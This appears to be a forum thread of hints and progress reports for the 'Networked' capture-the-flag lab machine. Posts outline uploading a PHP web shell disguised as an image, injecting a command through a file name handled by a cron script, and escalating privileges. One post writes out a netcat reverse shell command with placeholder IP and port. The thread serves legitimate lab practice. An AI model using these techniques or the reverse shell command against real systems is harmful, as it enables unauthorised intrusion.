Networked

Rooted. Was overthinking the user part and then again the privesc. Stick to basics.

Rooted.

PM if you need help!

Type your comment> @PanamaEd117 said:

not getting php to execute the shell. got any articles I can reference?

What an image can do for you?

ok I got in to the low privilaged shell. cant read from user.txt what should I do. PM for any idea. thnx

I’m almost at the point were i’m going to throw my laptop out of the windows. I’ve been stucked for days now.

I’m on the box as ae and trying to get a shell as g. I’ve read a lot about c*****d in and understand how it work but just not in the context of the ck_a*k.php and cron files.

I don’t understand where i could inject the command…i’ve try to create a file, upload a file with the command in the name, etc…

Help!! :frowning:

Type your comment> @casey said:

Type your comment> @PrimeSocK said:

Type your comment> @osmus said:

S> @osmus said:

Not sure how to get escalation after i get my shell. I’ve read _.php but im not sure what I need to do with it. Any nudges would be appreciated.

So I’m able to touch the file and the nc connects but the listener closes immediately. Does anyone know why that happens?

I’m stucked here to. I know it’s something I’m missing but don’t know what to do.
Can someone help?

Edit: nvm…just use “” instead of just "
I don’t have user but now I have 2 apache shells, it’s something!

Edit your nc command with a /bin/bash. Ex:

nc (IP) (PORT) -e /bin/bash

Finally got user. But no idea how people are getting that command to work. Netcat kept dying immediately, so I had to try other shells.

Finally rooted. PM for nudges.

Rooted. Very rewarding box. Loved that this was all about digging through scripts and understanding what they do.

Here for help if anyone needs it.

Type your comment> @Digsy said:

Hmmm. Got to u*****.php but whatever I do I cannot sneak a shell onto the site. Anyone got an idea where I could be going wrong?

Try to see what filetypes are allowed to be uploaded

Was banging my head against the wall for two hours because the u*****.*** wasn’t loading whatsoever and it took me a hot minute to give up and come to the forums. Finally got it to load. I guess some of you guys went to bed LOL. Now here we go…

Got low priv shell. Struggling on user, could I get a hint? Also Do we actually get the user pw or just the flag?

Got root. Took a few hours yesterday because kept randomizing shell between a****e and user. I think I did the root part “wrong” since I did nothing “fancy”. Lets say that for the root, my days on WoW PvP proved more useful than days on programming.

Got root. Tbh getting user was far more fun than getting root, anyways if anyone of you is stuck at some point or want me to guide you or provide some hints fell free to ping me :slight_smile:

Got root. Learned a couple of new tricks on this box, thank you for that guly!

So I copied the code in ck_a*k.php and made a leafpad file on my computer to test it because I get a error. So the check found no errors then when I run it it has a error. Dont know what to do about it.

PS vim is just a name I gave it its the code from the above file

root@FREAK2600:~/Desktop# php -l vim.php
No syntax errors detected in vim.php
root@FREAK2600:~/Desktop# python vim.php
File “vim.php”, line 1
<?php
^
SyntaxError: invalid syntax

I have got a webshell now, however I don’t understand why my payload is executed, eventhough the extensions is different. Can somebody tell me shortly?

Shout out to @MrXidus for the tip on getting root, was definitely a face palm moment as I spent days on it. But I did learn something which is why I’m here.

More then welcome to PM for help

Type your comment> @Cli3nt said:

I have got a webshell now, however I don’t understand why my payload is executed, eventhough the extensions is different. Can somebody tell me shortly?

To detect a file’s filetype, one might rely either on the extension or on the file header.

I got the initial shell but I am trying to get the user priv but not able to do so. Please guide me somewhere. Any help is appreciated.

Type your comment> @kalagan76 said:

I’m almost at the point were i’m going to throw my laptop out of the windows. I’ve been stucked for days now.

I’m on the box as ae and trying to get a shell as g. I’ve read a lot about c*****d in and understand how it work but just not in the context of the ck_a*k.php and cron files.

I don’t understand where i could inject the command…i’ve try to create a file, upload a file with the command in the name, etc…

Help!! :frowning:

same here bro :confused: